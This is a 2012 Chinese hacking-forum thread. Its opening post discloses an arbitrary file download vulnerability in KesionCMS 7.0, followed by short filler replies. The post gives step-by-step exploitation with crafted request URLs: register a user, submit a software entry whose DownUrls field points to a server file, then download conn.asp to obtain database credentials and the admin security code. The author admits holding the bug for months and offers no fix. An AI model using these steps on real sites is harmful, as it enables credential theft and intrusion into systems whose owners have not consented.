查看: 6475|回复: 53

kesioncms7.0, 最新版本任意下载漏洞

[复制链接]
发表于 2012-10-6 07:04:59 | 显示全部楼层 |阅读模式
作者:鬼哥版本:90sec
说明:请用于漏洞安全测试,请勿非法利用
修复方案:我想官方会懂的

漏洞检测方法:
先注册个用户登陆,然后访问http://www.xxx.net/user/Contributor.asp  可以看到几个可以投稿的分类,选择个软件投稿.点下一步!



然后会跳到:xxx.com/user/User_MySoftWare.asp?action=Add&channelid=3&ClassID=20102479005271(这个ClassID不同的站可能会不一样)

然后在把地址输入:xxx.com/user/User_MySoftWare.asp?action=AddSave&channelid=3&ClassID=20102479005271(上面的ClassID)&Title=aa&DownUrls=/admin63.net.asp(要下载的文件路径。)

输入好后就会发布一个标题为aa的软件投稿可以在xxx.com/user/User_ItemInfo.asp?ChannelID=3 看到 发布的投稿。

打开发布的aa投稿,然后会出现下载截面直接点下载就可以下载到conn.asp这个文件了,一般数据库地址,或者mssql 数据帐户 后台安全码等等 都会记录在里面!


由于时间晚了,我就随便说下咯,大概利用就是刚才我说的那样,漏洞放手里半年了,有兴趣的可以去研究下
[/td][/tr]
[/table]
发表于 2015-10-19 20:24:32 | 显示全部楼层
初来乍到,请多多关照。。。  
回复 支持 1 反对 0

使用道具 举报

发表于 2014-10-6 17:25:51 | 显示全部楼层
好帖,有才  
发表于 2014-10-20 04:53:21 | 显示全部楼层
赚点分不容易啊  
发表于 2014-10-27 00:59:48 | 显示全部楼层
回复一下  
发表于 2014-11-6 11:58:40 | 显示全部楼层
越办越好~~~~~~~~~`  
发表于 2014-11-18 21:50:38 | 显示全部楼层
彪悍的人生不需要解释。  
发表于 2014-12-6 16:27:25 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2014-12-29 20:41:54 | 显示全部楼层
好人一生平安  
发表于 2015-1-29 17:49:12 | 显示全部楼层
很好!很强大!  
发表于 2015-3-4 00:36:05 | 显示全部楼层
写得好啊 估计有马甲  
高级模式
B Color Image Link Quote Code Smilies

本版积分规则